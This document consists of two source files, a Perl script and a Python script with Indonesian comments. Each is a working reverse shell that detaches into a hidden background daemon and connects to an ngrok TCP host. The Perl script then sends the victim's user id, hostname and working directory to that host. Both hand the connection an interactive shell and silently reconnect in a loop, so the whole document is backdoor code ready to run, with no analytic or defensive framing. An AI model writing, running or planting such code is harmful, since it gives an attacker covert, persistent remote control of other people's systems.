File: ngehek.pl
#!/usr/bin/perl
use strict;
use warnings;
use Socket;
use POSIX;

# ================= CONFIGURATION =================
my $SERVER = "0.tcp.ap.ngrok.io";
my $PORT   = 14249;
my $SHELL  = "/bin/bash";
# =================================================

# Daemonize process
fork() && exit;
setsid();
fork() && exit;
chdir "/";

# Close stdio
close($_) for (*STDIN, *STDOUT, *STDERR);
open(STDIN,  "</dev/null");
open(STDOUT, ">/dev/null");
open(STDERR, ">/dev/null");

# Main loop
while (1) {
    my $socket;
    
    eval {
        # Create socket
        socket($socket, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
        
        # Connect
        my $addr = inet_aton($SERVER) or die "Cannot resolve";
        my $port = sockaddr_in($PORT, $addr);
        
        connect($socket, $port) or die "Connect failed";
        
        # ============ LANGKAH 1: KIRIM PERINTAH PERTAMA ============
        # Kirim hasil 'id' command sebagai banner
        my $id_output = `id 2>&1`;
        my $pwd_output = `pwd 2>&1`;
        my $hostname = `hostname 2>&1`;
        
        print $socket "=== AUTO-EXECUTE ON CONNECT ===\n";
        print $socket "User: $id_output";
        print $socket "Host: $hostname";
        print $socket "PWD: $pwd_output";
        print $socket "===============================\n";
        print $socket "Type 'exit' to close, or continue with shell...\n\n";
        
        # ============ LANGKAH 2: SPAWN TTY SHELL ============
        # Fork untuk menangani shell
        my $pid = fork();
        
        if ($pid == 0) {
            # Child process: Setup TTY dan spawn shell
            # Duplicate socket ke stdio
            open(STDIN,  "<&", $socket);
            open(STDOUT, ">&", $socket);
            open(STDERR, ">&", $socket);
            
            # Setup terminal
            my $tty = POSIX::ttyname(fileno(STDIN));
            if ($tty) {
                # Jika kita punya TTY, set raw mode
                system("stty raw -echo");
            }
            
            # Spawn interactive shell
            exec($SHELL, "-i");
            exit(0);
        } else {
            # Parent process: Wait for shell to exit
            waitpid($pid, 0);
        }
        
        # Close socket
        close($socket);
    };
    
    # Jika ada error, tunggu dan coba lagi
    if ($@) {
        # Silent fail
        sleep(15 + int(rand(10)));
    }
}

File: ngehek.py
#!/usr/bin/env python3
import socket
import os
import pty
import sys
import time
import signal
import atexit

def daemonize():
    """Fork process menjadi daemon"""
    try:
        pid = os.fork()
        if pid > 0:
            sys.exit(0)  # Exit parent
    except OSError as e:
        sys.stderr.write(f"Fork failed: {e}\n")
        sys.exit(1)
    
    # Detach dari terminal
    os.setsid()
    os.umask(0)
    
    # Fork kedua
    try:
        pid = os.fork()
        if pid > 0:
            sys.exit(0)
    except OSError as e:
        sys.stderr.write(f"Second fork failed: {e}\n")
        sys.exit(1)
    
    # Redirect stdio ke /dev/null
    sys.stdout.flush()
    sys.stderr.flush()
    si = open(os.devnull, 'r')
    so = open(os.devnull, 'a+')
    se = open(os.devnull, 'a+')
    
    os.dup2(si.fileno(), sys.stdin.fileno())
    os.dup2(so.fileno(), sys.stdout.fileno())
    os.dup2(se.fileno(), sys.stderr.fileno())

def reverse_shell():
    """Main reverse shell function dengan auto-reconnect"""
    HOST = "0.tcp.ap.ngrok.io"
    PORT = 17036
    RECONNECT_DELAY = 10
    
    while True:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(30)
            s.connect((HOST, PORT))
            
            # Duplikasi file descriptor
            os.dup2(s.fileno(), 0)
            os.dup2(s.fileno(), 1)
            os.dup2(s.fileno(), 2)
            
            # Spawn shell dengan PTY
            pty.spawn("/bin/sh")
            
            # Jika disconnect, close socket
            s.close()
            
        except (socket.error, OSError, KeyboardInterrupt) as e:
            # Silent fail, coba reconnect
            try:
                s.close()
            except:
                pass
            time.sleep(RECONNECT_DELAY)
            continue

if __name__ == "__main__":
    # Jadikan daemon
    daemonize()
    
    # Hilangkan parent process tracking
    signal.signal(signal.SIGHUP, signal.SIG_IGN)
    
    # Jalankan reverse shell
    reverse_shell()
